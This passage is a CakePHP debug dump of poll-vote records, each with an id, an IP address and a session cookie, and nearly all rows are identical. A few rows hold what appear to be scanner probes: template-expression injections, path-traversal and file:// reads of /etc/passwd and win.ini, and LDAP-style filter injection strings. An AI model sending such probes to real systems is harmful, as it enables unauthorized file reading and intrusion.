'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4585 => array(
'id' => '5128',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4586 => array(
'id' => '5129',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4587 => array(
'id' => '5130',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4588 => array(
'id' => '5131',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4589 => array(
'id' => '5132',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4590 => array(
'id' => '5133',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4591 => array(
'id' => '5134',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4592 => array(
'id' => '5135',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4593 => array(
'id' => '5136',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4594 => array(
'id' => '5137',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4595 => array(
'id' => '5138',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4596 => array(
'id' => '5139',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4597 => array(
'id' => '5140',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4598 => array(
'id' => '5141',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4599 => array(
'id' => '5142',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4600 => array(
'id' => '5143',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4601 => array(
'id' => '5144',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4602 => array(
'id' => '5145',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4603 => array(
'id' => '5146',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4604 => array(
'id' => '5147',
'ip' => '${10000195+9999823}',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4605 => array(
'id' => '5148',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4606 => array(
'id' => '5149',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4607 => array(
'id' => '5150',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4608 => array(
'id' => '5151',
'ip' => '194.34.233.72',
'ip1' => '${9999227+9999877}',
'sondage_id' => '2'
),
(int) 4609 => array(
'id' => '5152',
'ip' => 'file:///etc/passwd',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4610 => array(
'id' => '5153',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4611 => array(
'id' => '5154',
'ip' => '194.34.233.72',
'ip1' => 'aU1YT3RzQVptamR1SUhDbzNiWnN0cjFlRElIWDJRZGJzQ0xpWGpzYw==',
'sondage_id' => '2'
),
(int) 4612 => array(
'id' => '5155',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4613 => array(
'id' => '5156',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4614 => array(
'id' => '5157',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4615 => array(
'id' => '5158',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4616 => array(
'id' => '5159',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4617 => array(
'id' => '5160',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4618 => array(
'id' => '5161',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4619 => array(
'id' => '5162',
'ip' => '../194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4620 => array(
'id' => '5163',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4621 => array(
'id' => '5164',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4622 => array(
'id' => '5165',
'ip' => '194.34.233.72',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 4623 => array(
'id' => '5166',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4624 => array(
'id' => '5167',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4625 => array(
'id' => '5168',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4626 => array(
'id' => '5169',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4627 => array(
'id' => '5170',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4628 => array(
'id' => '5171',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4629 => array(
'id' => '5172',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4630 => array(
'id' => '5173',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4631 => array(
'id' => '5174',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4632 => array(
'id' => '5175',
'ip' => '194.34.233.72',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 4633 => array(
'id' => '5176',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4634 => array(
'id' => '5177',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4635 => array(
'id' => '5178',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4636 => array(
'id' => '5179',
'ip' => '194.34.233.72',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 4637 => array(
'id' => '5180',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4638 => array(
'id' => '5181',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4639 => array(
'id' => '5182',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4640 => array(
'id' => '5183',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4641 => array(
'id' => '5184',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4642 => array(
'id' => '5185',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4643 => array(
'id' => '5186',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4644 => array(
'id' => '5187',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4645 => array(
'id' => '5188',
'ip' => '194.34.233.72',
'ip1' => '../CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4646 => array(
'id' => '5189',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4647 => array(
'id' => '5190',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4648 => array(
'id' => '5191',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4649 => array(
'id' => '5192',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4650 => array(
'id' => '5193',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4651 => array(
'id' => '5194',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4652 => array(
'id' => '5195',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4653 => array(
'id' => '5196',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4654 => array(
'id' => '5197',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4655 => array(
'id' => '5198',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4656 => array(
'id' => '5199',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4657 => array(
'id' => '5200',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4658 => array(
'id' => '5201',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4659 => array(
'id' => '5202',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4660 => array(
'id' => '5203',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4661 => array(
'id' => '5204',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4662 => array(
'id' => '5205',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4663 => array(
'id' => '5206',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4664 => array(
'id' => '5207',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4665 => array(
'id' => '5208',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4666 => array(
'id' => '5209',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4667 => array(
'id' => '5210',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4668 => array(
'id' => '5211',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4669 => array(
'id' => '5212',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4670 => array(
'id' => '5213',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4671 => array(
'id' => '5214',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4672 => array(
'id' => '5215',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4673 => array(
'id' => '5216',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4674 => array(
'id' => '5217',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4675 => array(
'id' => '5218',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4676 => array(
'id' => '5219',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4677 => array(
'id' => '5220',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4678 => array(
'id' => '5221',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4679 => array(
'id' => '5222',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4680 => array(
'id' => '5223',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4681 => array(
'id' => '5224',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4682 => array(
'id' => '5225',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4683 => array(
'id' => '5226',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4684 => array(
'id' => '5227',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4685 => array(
'id' => '5228',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4686 => array(
'id' => '5229',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4687 => array(
'id' => '5230',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4688 => array(
'id' => '5231',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4689 => array(
'id' => '5232',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4690 => array(
'id' => '5233',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4691 => array(
'id' => '5234',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4692 => array(
'id' => '5235',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4693 => array(
'id' => '5236',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4694 => array(
'id' => '5237',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4695 => array(
'id' => '5238',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4696 => array(
'id' => '5239',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4697 => array(
'id' => '5240',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4698 => array(
'id' => '5241',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4699 => array(
'id' => '5242',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4700 => array(
'id' => '5243',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4701 => array(
'id' => '5244',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4702 => array(
'id' => '5245',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4703 => array(
'id' => '5246',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4704 => array(
'id' => '5247',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4705 => array(
'id' => '5248',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4706 => array(
'id' => '5249',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4707 => array(
'id' => '5250',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4708 => array(
'id' => '5251',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4709 => array(
'id' => '5252',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4710 => array(
'id' => '5253',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4711 => array(
'id' => '5254',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4712 => array(
'id' => '5255',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4713 => array(
'id' => '5256',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4714 => array(
'id' => '5257',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4715 => array(
'id' => '5258',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4716 => array(
'id' => '5259',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4717 => array(
'id' => '5260',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4718 => array(
'id' => '5261',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4719 => array(
'id' => '5262',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4720 => array(
'id' => '5263',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4721 => array(
'id' => '5264',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4722 => array(
'id' => '5265',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4723 => array(
'id' => '5266',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4724 => array(
'id' => '5267',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4725 => array(
'id' => '5268',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4726 => array(
'id' => '5269',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4727 => array(
'id' => '5270',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4728 => array(
'id' => '5271',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4729 => array(
'id' => '5272',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4730 => array(
'id' => '5273',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4731 => array(
'id' => '5274',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4732 => array(
'id' => '5275',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4733 => array(
'id' => '5276',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4734 => array(
'id' => '5277',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4735 => array(
'id' => '5278',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4736 => array(
'id' => '5279',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4737 => array(
'id' => '5280',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4738 => array(
'id' => '5281',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4739 => array(
'id' => '5282',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4740 => array(
'id' => '5283',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4741 => array(
'id' => '5284',
'ip' => ')',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4742 => array(
'id' => '5285',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4743 => array(
'id' => '5286',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201&n980717=v953967',
'sondage_id' => '2'
),
(int) 4744 => array(
'id' => '5287',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4745 => array(
'id' => '5288',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4746 => array(
'id' => '5289',
'ip' => '!(()&&!|*|*|',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4747 => array(
'id' => '5290',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4748 => array(
'id' => '5291',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4749 => array(
'id' => '5292',
'ip' => '^(#$!@#$)(()))******',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4750 => array(
'id' => '5293',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4751 => array(
'id' => '5294',
'ip' => '194.34.233.72',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 4752 => array(
'id' => '5295',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4753 => array(
'id' => '5296',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4754 => array(
'id' => '5297',
'ip' => '194.34.233.72',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 4755 => array(
'id' => '5298',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4756 => array(
'id' => '5299',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4757 => array(
'id' => '5300',
'ip' => '194.34.233.72',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 4758 => array(
'id' => '5301',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4759 => array(
'id' => '5302',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4760 => array(
'id' => '5303',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4761 => array(
'id' => '5304',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4762 => array(
'id' => '5305',
'ip' => '194.34.233.72',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4763 => array(
'id' => '5306',
'ip' => '194.34.233.72',
